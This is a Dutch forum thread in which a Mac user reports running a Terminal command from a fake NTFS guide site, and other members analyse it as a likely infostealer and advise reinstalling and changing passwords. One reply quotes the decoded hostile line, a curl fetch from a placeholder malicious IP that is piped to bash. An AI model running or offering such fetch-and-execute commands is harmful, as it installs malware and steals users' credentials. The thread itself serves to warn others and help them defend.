Toon posts:

Mac Terminal verdachte actie

Pagina: 1
Acties:

Onderwerpen

Malware

Vraag

zondag 12 april 2026 20:22

Acties:
  • Siegfriedo
  • Registratie: April 2026
  • Laatst online: 06-05 10:02

Siegfriedo

Topicstarter
Toen ik zocht naar een gratis alternatief om NTSF schijven te bewerken via een Mac
kwam ik volgende wegsite tegen:

ntfs-devmac craft me slash guide?gad_source=1

Hier beweert men Mac OS NTSF bestanden standaard zou kunnen bewerken via een bewerking in de terminal.
Ik kopieerde het script en gaf deze in via terminal maar merkte meteen dat er in de terminal een download plaatsvond en gevolgd door een vreemde banner die vroeg naar mijn wachtwoord.

Snel even in chat GPT het script ingegeven en kreeg de melding dat dit heel verdacht is
vooral de Base64 ecoded string, er zou een ongebekend script van een onbekend IP adres worden ingelezen en een tool downloaden..

Ik kreeg een waslijst tips van chat gpt die ik kon uitvoeren in de terminal maar telkens geen resultaat.
Uiteindelijke kreeg ik toch de tip om een clean install te doen voor de zekerheid.

Heb 2 malware scanners geinstalleerd, Malwarebytes en Avanst en beiden vonden niets.
Ik ben niet helemaal overtuigd vanwege de download en de vreemde banner.

Iemand die hier iets van kent en kan zeggen wat dit kan zijn?

Bedankt alvast

Siegfried

[ Voor 0% gewijzigd door F_J_K op 24-04-2026 20:09 . Reden: beter geen klikbare malware plaatsen ]

Alle reacties

zondag 12 april 2026 20:34

Acties:
  • jeroen3
  • Registratie: Mei 2010
  • Laatst online: 08:41

jeroen3

Uh ja dat script download dus een executable en voert dat uit.

Waarschijnlijk in een elevated prompt.

Erg dom. Niet meer doen.
https://www.virustotal.co...hMWEwZWY6MTc3NjAxODc2NQ==

Lijkt op een infostealer, verander op andere hardware je wachtwoorden en zorg voor 2fa.

donderdag 16 april 2026 10:37

Acties:
  • Ruben279
  • Registratie: Augustus 2018
  • Nu online

Ruben279

Het begin van code code ziet er leuk uit, daar wordt nog wel gesproken over NTFS drivers. Maar het stuk tekst na de echo is een base64 string. Als je deze omzet naar tekst krijg je het commando "curl -fsSL http://MALFIDE-IP-ADRES/enable".

Het IP-adres komt uit de range van Hostinger, dus dit zal een IP-adres zijn van een VM die daar gehost wordt die de malafide software host.

Dat het script daarna prompt om je wachtwoord in te geven wordt vermoedelijk gebruikt om daarna nog meer commando's uit te voeren (waar normaal elevated rechten voor nodig zijn) om bijv. gegevens te stelen of bijv. control-and-command software te installeren zodat je laptop mee kan gaan doen in een botnet van geïnfecteerde machines.


Ik zou je laptop niet meer vertrouwen, en ik zou daarom ook een volledige herinstallatie doen. Hopelijk heb je nog een backup van het moment voordat je het commando uitvoerde.

[ Voor 11% gewijzigd door Ruben279 op 16-04-2026 10:40 . Reden: Aanvulling ]

donderdag 16 april 2026 16:31

Acties:
  • jurroen
  • Registratie: Mei 2012
  • Laatst online: 06-05 18:05

jurroen

Security en privacy geek

Ruben279 schreef op donderdag 16 april 2026 @ 10:37:

Ik zou je laptop niet meer vertrouwen, en ik zou daarom ook een volledige herinstallatie doen. Hopelijk heb je nog een backup van het moment voordat je het commando uitvoerde.
Dit. En op Apple Silicon vereist dat DFU (en dus een andere Mac om 'm te flashen).

Als je dan schoon bent zijn, zowel Paragon als Tuxera hebben een goede en betrouwbare NTFS app. Beide minder dan drie tientjes.

Ongevraagde verzoeken per DM beantwoord ik niet, sorry

vrijdag 24 april 2026 15:02

Acties:
  • pjottum
  • Registratie: Mei 2000
  • Laatst online: 07:39

pjottum

¯\_(ツ)_/¯

Spuit elf, na een week, maar goed:

Elk commando dat ruikt naar curl | bash is een bijzonder slecht idee.
Je weet niet dat je dat hier gedaan hebt - dat klopt, daarom is het commando base64 encoded.

Wat @Ruben279, @jeroen3 en @jurroen - en ik gedaan hebben is die commandline oppakken en kijken wat die string doet. Die string doet een curl en voedt dat aan bash. Die haalt dan een scriptje op, die doet dan weer iets met een ander scriptje en doet dat weer in bash, en dan krijg je de echte payload via een gehackt domein...

Dus ja, die laptop bevriezen, offline mikken, reinstall zoals @jurroen schreef, desnoods bij je lokale apple dealer en op de blaren zitten, helaas. Daar gaat chat niks aan veranderen.

I have usernames older than you.

vrijdag 24 april 2026 16:29

Acties:
  • jeroen3
  • Registratie: Mei 2010
  • Laatst online: 08:41

jeroen3

@pjottum ik had de daadwerkelijke payload gedownload en in virustotal gemikt.

vrijdag 1 mei 2026 22:12

Acties:
  • Ruben279
  • Registratie: Augustus 2018
  • Nu online

Ruben279

Kom net deze post tegen op Reddit en moest direct weer terugdenken aan dit topic.

Staat inhoudelijk nog wel e.e.a. meer uitgelegd over wat dit script precies doet. Of het 100% dezelfde is weet ik niet zeker, maar in ieder geval wel vergelijkbaar omdat beide gestart worden vanuit Terminal en een file van internet halen en direct uitvoeren.

https://www.reddit.com/r/MacOS/comments/1t0xjdb/im_an_idiot_please_help_me_maybe_installed_virus/
Pagina: 1
Reageer